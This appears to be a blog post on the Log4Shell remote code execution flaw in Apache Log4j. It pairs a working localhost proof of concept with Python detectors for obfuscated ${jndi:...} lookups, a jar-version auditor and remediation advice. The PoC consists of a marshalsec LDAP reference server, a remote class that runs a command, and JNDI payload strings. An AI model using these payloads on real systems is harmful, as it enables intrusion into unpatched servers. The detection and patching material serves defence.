Apache Log4j Remote Code Execution Vulnerability and Remediation

GoogleVip8 · 1 month ago · 229 views

Apache-Log4j

Apache Log4j Remote Code Execution

An attacker can trigger remote code execution simply by crafting a malicious request; no special configuration is needed on the target. According to verification by the Alibaba Cloud security team, Apache Struts2, Apache Solr, Apache Druid, Apache Flink and others are all affected. The root cause (CVE-2021-44228, affecting Log4j 2.x from 2.0-beta9 through 2.14.1) is that Log4j 2 resolves ${...} lookups inside the text of logged messages, and the jndi lookup contacts whatever LDAP or RMI server the string names, so any attacker-controlled value that reaches a log call (a User-Agent header, a username, a search query) is enough.


Reference: https://gitee.com/jby6666/apache-log4j-poc.git

Steps

  1. Compile Log4jRCE.java and start an HTTP server in the directory holding the resulting Log4jRCE.class: python -m http.server 8888
  2. Start the LDAP server. marshalsec's LDAPRefServer listens on port 1389 and answers every query with a reference whose codebase points at the HTTP server from step 1:
git clone git@github.com:mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"
  3. Run log4j.java; the command line prints I am Log4jRCE from remote!!!. Under the hood, Log4j resolves the ${jndi:...} lookup in the logged message, the JDK's JNDI client follows the LDAP reference, downloads Log4jRCE.class from the HTTP server and calls newInstance() on it, so both the static initializer and the constructor run.

Note on the JDK version: loading a class from a remote codebase through an LDAP reference requires com.sun.jndi.ldap.object.trustURLCodebase=true, which the JDK has defaulted to false since 8u191 and 11.0.1. On a newer JDK this PoC prints nothing, but the vulnerable lookup still happens (the outbound LDAP/DNS connection is still made, which is what most scanners detect), and attack paths that do not rely on remote class loading, such as deserialization of an attacker-supplied object through a gadget on the application's classpath, remain possible. Patch regardless of JDK version.
// log4j.java: the "victim" application. Its only fault is logging attacker-controlled text.
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class log4j {

    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        // In a real application this string would be attacker input (a header, a form field, ...).
        // Log4j 2.x below 2.15.0 resolves ${jndi:...} inside the message and performs the LDAP lookup.
        logger.error("${jndi:ldap://127.0.0.1:1389/a}");
    }
}
// Log4jRCE.java: served by the HTTP server from step 1. The static initializer runs as soon as the
// class is loaded, before any constructor, so no method of the class ever needs to be called.
public class Log4jRCE {

    static {
        System.out.println("I am Log4jRCE from remote!!!");
        try {
            String[] cmd = {"calc"};   // Windows calculator; on Linux use e.g. {"touch", "/tmp/log4jrce"}
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
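The detection side of the same behaviour, as an added example that is not part of the original post or of the PoC repository: a small Python scanner over web-server access log lines. Because Log4j's StrSubstitutor resolves nested lookups before it evaluates the outer one, attackers hide the jndi keyword behind forms such as ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...}; a scanner that only greps for the literal text ${jndi: misses them. The code below URL-decodes each line, collapses those inner lookups the way Log4j would, and then matches. The log lines, addresses and ports in it are constructed for the example.

```python
"""Spot Log4Shell lookup strings in access logs (added example, not code from the original page)."""
import re
from urllib.parse import unquote

# Innermost nested lookups that Log4j 2's StrSubstitutor resolves before the outer lookup runs:
#   ${lower:J} / ${upper:j}        -> case-mapped text
#   ${::-j}, ${env:NOPE:-j}, ...   -> the default after ':-' when the key does not exist
INNER_LOOKUP = re.compile(r"\$\{(?:(lower|upper):([^${}]*)|[^${}]*?:-([^${}]*))\}")
# Log4j matches the lookup prefix case-insensitively, so ${JNDI:...} works too.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(m):
    if m.group(1) == "lower":
        return m.group(2).lower()
    if m.group(1) == "upper":
        return m.group(2).upper()
    return m.group(3)


def normalize(s):
    """Collapse nested lookups inside-out until nothing changes, as Log4j itself would."""
    prev = None
    while prev != s:
        prev, s = s, INNER_LOOKUP.sub(_resolve, s)
    return s


def extract_jndi_lookup(s):
    """Return the ${jndi:...} lookup as Log4j would see it after nested resolution, or None."""
    norm = normalize(unquote(s))   # access logs usually keep the URL-encoded form of the request line
    m = JNDI_LOOKUP.search(norm)
    if not m:
        return None
    end = norm.find("}", m.end())
    return norm[m.start():end + 1] if end != -1 else norm[m.start():]


def scan_access_log(text):
    """(line number, normalized lookup) for every line that carries a JNDI lookup."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        found = extract_jndi_lookup(line)
        if found:
            hits.append((n, found))
    return hits


# Constructed sample: one benign request, four probe styles seen for CVE-2021-44228, one benign lookup.
CONSTRUCTED_ACCESS_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://127.0.0.1:1389/a}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://127.0.0.1:1389/a} HTTP/1.1" 404 0 "-" "curl/7.79"
10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://127.0.0.1:1389/a}"
10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F127.0.0.1%3A1099%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.79"
10.0.0.7 - - [10/Dec/2021:12:00:06 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 99 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for line_no, lookup in scan_access_log(CONSTRUCTED_ACCESS_LOG):
        print(f"line {line_no}: {lookup}")
```

Lines 2 to 5 are reported with the same normalized form ${jndi:ldap://127.0.0.1:1389/a} (line 5 as rmi://...:1099/a); line 6 carries a lookup but not a jndi one and is left alone. The same normalization is worth applying to any WAF or SIEM rule, since the literal string ${jndi: is the one form attackers stopped using first.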

Remediation:

(1) Add the JVM argument -Dlog4j2.formatMsgNoLookups=true (the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true has the same effect).

(2) Add a log4j2.component.properties file on the application classpath containing log4j2.formatMsgNoLookups=true.

Both settings only exist from Log4j 2.10.0 onwards, and Apache has since declared them insufficient: they do not stop the Thread Context (MDC) lookup path of CVE-2021-45046 and there are other code paths in which message lookups still occur. Treat them as a stop-gap. The complete fix is to upgrade log4j-core to one of Apache's recommended releases, 2.17.1 for Java 8+, 2.12.4 for Java 7 or 2.3.2 for Java 6. Where upgrading is not immediately possible, removing the lookup class from the jar works on every 2.x release: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class, then restart the application. Remember that log4j-core is frequently bundled inside application WARs, fat jars and vendor appliances, so check every archive, not only the jars you deploy yourself.
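To find out which of the above applies to a given deployment, an added example in Python (not code from the original post): it opens a jar, reads the version from the META-INF/maven/.../pom.properties entry that Maven-built log4j-core jars carry, checks whether JndiLookup.class is still present, and recurses into nested archives so WAR, EAR and fat-jar bundles are covered. The version thresholds are Apache's recommended releases named above. The stand-in jars the example builds for itself are constructed for the example, with placeholder bytes where real class files would be.

```python
"""Audit jars for a vulnerable log4j-core (added example, not code from the original page)."""
import io
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven-built log4j-core jars record their version in this entry.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(version):
    """'2.14.1' -> (2, 14, 1). Pre-releases such as '2.0-beta9' become (2, 0, 9), still below every fixed release."""
    nums = [int(x) for x in re.findall(r"\d+", version)]
    return tuple((nums + [0, 0, 0])[:3])


def status(version, has_jndi_lookup):
    """'fixed' on an Apache-recommended release (2.17.1 / 2.12.4 / 2.3.2 lines), 'mitigated' if JndiLookup.class
    was deleted from an older jar, 'needs-upgrade' otherwise, 'unknown' when no version could be read."""
    if version is None:
        return "unknown"
    v = parse_version(version)
    fixed = (v >= (2, 17, 1)
             or (2, 12, 4) <= v < (2, 13, 0)
             or (2, 3, 2) <= v < (2, 4, 0))
    if fixed:
        return "fixed"
    if not has_jndi_lookup:
        return "mitigated"     # the zip -d workaround was applied
    return "needs-upgrade"


def scan_jar(data, path):
    """Return (path, version, has_jndi_lookup, status) for every log4j-core found in the archive bytes,
    descending into nested archives; nested paths are written outer!inner."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in z.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_jndi = JNDI_LOOKUP_CLASS in names
        if version is not None or has_jndi:     # a shaded jar may carry the class without the pom entry
            findings.append((path, version, has_jndi, status(version, has_jndi)))
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(scan_jar(z.read(name), f"{path}!{name}"))
    return findings


def fake_log4j_core(version, with_jndi_lookup=True):
    """Constructed stand-in for log4j-core-<version>.jar; the check never looks at class contents."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(POM_PROPERTIES,
                   f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        z.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if with_jndi_lookup:
            z.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def fake_war(libs):
    """Constructed WAR embedding {filename: jar bytes} under WEB-INF/lib/."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("WEB-INF/web.xml", "<web-app/>")
        for name, data in libs.items():
            z.writestr(f"WEB-INF/lib/{name}", data)
    return buf.getvalue()


if __name__ == "__main__":
    war = fake_war({
        "log4j-core-2.14.1.jar": fake_log4j_core("2.14.1"),
        "log4j-core-2.14.1-stripped.jar": fake_log4j_core("2.14.1", with_jndi_lookup=False),
        "log4j-core-2.17.1.jar": fake_log4j_core("2.17.1"),
    })
    for path, version, has_jndi, verdict in scan_jar(war, "app.war"):
        print(f"{verdict:14} {version or '?':8} JndiLookup={'present' if has_jndi else 'absent'}  {path}")
```

For a real deployment, feed scan_jar the bytes of each archive under the application directory (and the running JVM's classpath, which may differ from what is on disk). A jar that reports needs-upgrade with JndiLookup present is exploitable regardless of the formatMsgNoLookups setting on releases below 2.10.0, and only partially protected by it on 2.10.0 through 2.14.1.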

